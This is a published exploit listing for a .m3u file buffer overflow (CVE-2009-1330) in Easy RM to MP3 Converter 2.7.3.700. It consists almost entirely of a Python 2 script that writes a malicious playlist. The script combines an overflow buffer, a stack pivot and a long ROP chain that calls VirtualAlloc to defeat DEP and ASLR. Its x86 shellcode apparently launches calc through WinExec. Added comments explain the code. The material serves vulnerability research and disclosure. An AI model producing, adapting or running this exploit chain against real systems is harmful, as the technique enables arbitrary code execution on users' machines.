Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)

🗓️ 13 Jun 2016 00:00:00Reported by Fitzl CsabaType 

Easy RM to MP3 Converter 2.7.3.700 '.m3u' Exploit with DEP+ASLR bypass

# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
 
import struct
 
def create_rop_chain():
    """Return the ROP chain as one packed byte string.

    Every entry of ``rop_gadgets`` is emitted, in list order, as a
    little-endian unsigned 32-bit word via ``struct.pack('<I', ...)``.
    The list order *is* the chain, so entries must not be reordered or
    deduplicated; repeated entries are deliberate.

    Python 2 only: ``''.join`` over ``struct.pack`` output relies on
    ``str`` being the bytes type. On Python 3 ``struct.pack`` returns
    ``bytes`` and the join raises ``TypeError``.
    """
 
    # rop chain generated with mona.py - www.corelan.be
    # added missing parts, and some optimisation by Csaba Fitzl
    rop_gadgets = [
 
      #mov 1000 to EDX - Csaba
      0x41414141,  # Filler (compensate)
      0x41414141,  # Filler (compensate)
      0x41414141,  # Filler (compensate)
      0x10025a1c,  # XOR EDX,EDX # RETN 
      0x1002bc3d,  # MOV EAX,411 # RETN
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
      0x41414141,  # Filler (compensate)
      0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
      0x41414141,  # Filler (compensate)
      0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
      0x41414141,  # Filler (compensate)
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x10023327,  # INC EAX # RETN
      0x10023327,  # INC EAX # RETN
      0x10023327,  # INC EAX # RETN
      # AT this point EAX = 0x1000
      0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
      0x41414141,  # Filler (compensate)
      0x41414141,  # Filler (compensate)
      0x41414141,  # Filler (compensate)
      0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
      0x41414141,  # Filler (compensate)
       
     
      0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll] 
      0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
      0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
        
      0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
      0x41414141,  # Filler (compensate)
      0x41414141,  # Filler (compensate)
      0x41414141,  # Filler (compensate)
      0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll] 
      0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
      0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll] 
      0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
      0x1001d2ac,  # ADD EAX,4 # RETN
      0x10023327,  # INC EAX # RETN
      0x10023327,  # INC EAX # RETN
      0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
      0x41414141,  # Filler (compensate)
      0x41414141,  # Filler (compensate)
 
      0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll] 
      0xffffffff,  #  
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
      0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll] 
      0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
      0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll] 
      0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
      0x1002bc07  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL 
 
    ]
    # `_` is used here as an ordinary loop variable, not a throwaway;
    # each entry is packed as an unsigned little-endian 32-bit word.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
# Module-level script body (Python 2: all string literals below are byte
# strings). It assembles the crafted playlist contents and writes them to
# list.m3u in the current directory.
buffersize = 26090  # number of filler bytes that precede the overwritten return address
 
junk = "A" * buffersize
 
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} :  # ADD ESP,8 # RETN
 
rop = create_rop_chain()
 
# Raw x86 payload bytes, left as the author supplied them. The embedded
# ASCII "calc" and "WinE" suggest a WinExec("calc") proof-of-concept —
# inferred from the bytes, not verified here.
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
  
 
shell = "\x90"*0x10 + calc  # 16 NOP bytes ahead of the payload
 
# rop + shell + 'C' padding always totals 1000 bytes; if rop and shell ever
# exceeded 1000 bytes the multiplier would go negative and the padding would
# silently become empty.
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
 
filename = "list.m3u"
# Opened in text mode ('w') and closed explicitly rather than via `with`,
# as in the original; any exception between open and close leaks the handle.
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()

#  0day.today [2018-01-10]  #
